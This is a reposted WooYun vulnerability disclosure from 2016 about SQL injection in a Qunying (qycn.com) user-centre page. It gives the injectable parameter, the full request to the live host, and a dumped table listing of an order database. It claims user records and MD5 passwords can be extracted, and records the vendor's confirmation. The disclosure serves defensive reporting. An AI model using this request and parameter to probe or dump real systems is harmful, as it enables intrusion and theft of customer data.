群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

admin
admin
admin
109383
文章
90
评论
2017年5月2日02:50:00评论360 views字数 217阅读0分43秒阅读模式
摘要

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-196534

漏洞标题: 群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

相关厂商: qy.com.cn

漏洞作者: 路人甲

提交时间: 2016-04-15 11:56

公开时间: 2016-05-30 14:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

简要描述:

详细说明:

https://uc.qycn.com/login.php

群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

注入参数:an_status

code 区域 
GET https://uc.qycn.com/announcement.php?an_status=1&act=search&an_publish_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%8F%91%E5%B8%83%E6%97%A5%E6%9C%9F&an_end_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%BB%93%E6%9D%9F%E6%97%A5%E6%9C%9F&keyword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&type=list&submit=%E6%90%9C+%E7%B4%A2 HTTP/1.1
 Host: uc.qycn.com
 Connection: keep-alive
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
 Referer: https://uc.qycn.com/announcement.php?act=list
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: zh-CN,zh;q=0.8

群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

dbs:

群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

百万订单:

code 区域 
Database: newqycn_pay
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | qy_order                | 996877  |
 | qy_business             | 471212  |
 | qy_order_buydetail      | 437606  |
 | qy_useraccount          | 418035  |
 | qy_order_serviceparams  | 309086  |
 | qy_order_service        | 300540  |
 | qy_account_log          | 177322  |
 | qy_order_sms            | 133378  |
 | qy_order_regdomain      | 93107   |
 | qy_pay_logs             | 83300   |
 | qy_order_domain         | 76166   |
 | qy_order_payment        | 35233   |
 | qy_order_dns            | 19719   |
 | qy_yeepay_log           | 8797    |
 | qy_paypricelog          | 3020    |
 | qy_payment_statis       | 1544    |
 | qy_order_transfer       | 799     |
 | qy_order_servicegift    | 438     |
 | qy_order_receipt        | 365     |
 | qy_manual_pay           | 317     |
 | qy_order_device         | 178     |
 | qy_order_address        | 176     |
 | qy_order_voice          | 137     |
 | qy_order_auth           | 98      |
 | qy_order_safe           | 95      |
 | qy_orderinfo            | 63      |
 | qy_order_jk             | 61      |
 | qy_safe_info            | 15      |
 | qy_order_payment_client | 9       |
 | qy_safe_checkinfo       | 7       |
 +-------------------------+---------+

百万用户记录:

群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

可脱裤,密码为md5加密:

群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

群英某系统SQL注入(涉及百万订单/用户数据/密码/可拖库)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-15 14:13

厂商回复:

谢谢支持,我们马上安排跟进!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin